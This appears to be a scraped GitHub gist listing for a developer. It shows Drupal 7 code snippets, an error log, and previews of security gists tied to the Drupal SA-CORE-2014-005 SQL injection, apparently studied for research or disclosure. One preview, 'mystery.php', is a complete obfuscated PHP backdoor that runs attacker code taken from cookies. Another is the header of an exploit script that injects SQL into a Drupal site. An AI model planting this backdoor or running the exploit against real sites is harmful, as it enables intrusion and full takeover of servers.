Matt Korostoff MKorostoff

## mystery.php
<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();

## exploit.php
<?php
/**
 * @author Matt Korostoff <mkorostoff@gmail.com>
 *
 * @copyright Licensed under the GNU General Public License as published by the Free
 * Software Foundation, either version 3 of the License, or (at your option)
 * any later version.  http://www.gnu.org/licenses/
 *
 * @usage php path/to/this/file.php 'http://example.com'
 */

## gist:b1e482b675ec00e53726
<?php
/**
 * The contents of $sql will be injected into a Drupal site located at $url
 *
 * @usage
 * php /path/to/this/file.php 'http://example.com' 'SELECT * FROM node'
 *
 * Based on http://www.exploit-db.com/exploits/34993/ by Dustin Dorr
 */
$url = $argv[1];

## gist:5b8f8fa4eb0e5a9cf1fc
<?php
protected function expandArguments(&$query, &$args) {
    $modified = FALSE;

    // If the placeholder value to insert is an array, assume that we need
    // to expand it out into a comma-delimited set of placeholders.
    foreach (array_filter($args, 'is_array') as $key => $data) {
      $new_keys = array();
      foreach ($data as $i => $value) {
        // This assumes that there are no other placeholders that use the same

## gist:e7646fdf26a7532d27ac
<?php
/**
 * @file
 *   A de-obfuscated version of the file used by some attackers to install
 *   backdoors on drupal sites, using the Drupal SA-CORE-2014-005 vulnerabilty.
 *
 * @usage
 *   Runs any php code supplied by the user as a base64_encoded string in a
 *   cookie.
 *

## gist:c5dc5e15bbe35ef6f303
WD Apache Solr: HTTP Status: 0; Message: Request failed: Connection refused; Response: ; Request: [error]
Unknown; Caller: call_user_func_array() (line Unknown of Unknown)
WD Apache Solr: HTTP 0; Request failed: Connection refused in apachesolr_cron                     [error]
WD Apache Solr: No Solr instance available during indexing.                                       [error]
Enter PEM pass phrase:
stream_socket_client(): Unable to set private key file                                            [warning]
`/mnt/gfs/nbcupowertest/sites/default/files/files-private/apns-development-e222ab56e6.pem'
push_notifications.module:947
stream_socket_client(): failed to create an SSL handle push_notifications.module:947              [warning]
stream_socket_client(): Failed to enable crypto push_notifications.module:947                     [warning]

## gist:6030941f9ff36333f7f9
<?php
//Drupal 7
print l('Hello world', 'node/1');
//prints <a href="/path/to/node/alias">Hello world</a>

## gist:de511538548022b5e5aa
<?php
//drupal 7
$node = node_load(1);
print $node->created; //prints "1415659696"

## gist:384c7f38aa8a94b598d9
<?php
//drupal 7
$node = menu_get_object();

## gist:4dfa9e447933b69b6043
<?php

//DRUPAL 7 VERSION; DO NOT USE FOR DRUPAL 8
$query = new EntityFieldQuery();
$next = $query->propertyCondition('created', $created_time, '>')
  ->entityCondition('bundle', 'article')
  ->propertyOrderBy('created', 'ASC')
  ->range(0, 1)
  ->execute();
//DRUPAL 7 VERSION; DO NOT USE FOR DRUPAL 8
	<?php
	/**
	* @author Matt Korostoff <mkorostoff@gmail.com>
	*
	* @copyright Licensed under the GNU General Public License as published by the Free
	* Software Foundation, either version 3 of the License, or (at your option)
	* any later version. http://www.gnu.org/licenses/
	*
	* @usage php path/to/this/file.php 'http://example.com'
	*/
	<?php
	/**
	* The contents of $sql will be injected into a Drupal site located at $url
	*
	* @usage
	* php /path/to/this/file.php 'http://example.com' 'SELECT * FROM node'
	*
	* Based on http://www.exploit-db.com/exploits/34993/ by Dustin Dorr
	*/
	$url = $argv[1];
	<?php
	protected function expandArguments(&$query, &$args) {
	$modified = FALSE;

	// If the placeholder value to insert is an array, assume that we need
	// to expand it out into a comma-delimited set of placeholders.
	foreach (array_filter($args, 'is_array') as $key => $data) {
	$new_keys = array();
	foreach ($data as $i => $value) {
	// This assumes that there are no other placeholders that use the same
	<?php
	/**
	* @file
	* A de-obfuscated version of the file used by some attackers to install
	* backdoors on drupal sites, using the Drupal SA-CORE-2014-005 vulnerabilty.
	*
	* @usage
	* Runs any php code supplied by the user as a base64_encoded string in a
	* cookie.
	*
	WD Apache Solr: HTTP Status: 0; Message: Request failed: Connection refused; Response: ; Request: [error]
	Unknown; Caller: call_user_func_array() (line Unknown of Unknown)
	WD Apache Solr: HTTP 0; Request failed: Connection refused in apachesolr_cron [error]
	WD Apache Solr: No Solr instance available during indexing. [error]
	Enter PEM pass phrase:
	stream_socket_client(): Unable to set private key file [warning]
	`/mnt/gfs/nbcupowertest/sites/default/files/files-private/apns-development-e222ab56e6.pem'
	push_notifications.module:947
	stream_socket_client(): failed to create an SSL handle push_notifications.module:947 [warning]
	stream_socket_client(): Failed to enable crypto push_notifications.module:947 [warning]
	<?php
	//Drupal 7
	print l('Hello world', 'node/1');
	//prints <a href="/path/to/node/alias">Hello world</a>
	<?php
	//drupal 7
	$node = node_load(1);
	print $node->created; //prints "1415659696"
	<?php

	//DRUPAL 7 VERSION; DO NOT USE FOR DRUPAL 8
	$query = new EntityFieldQuery();
	$next = $query->propertyCondition('created', $created_time, '>')
	->entityCondition('bundle', 'article')
	->propertyOrderBy('created', 'ASC')
	->range(0, 1)
	->execute();
	//DRUPAL 7 VERSION; DO NOT USE FOR DRUPAL 8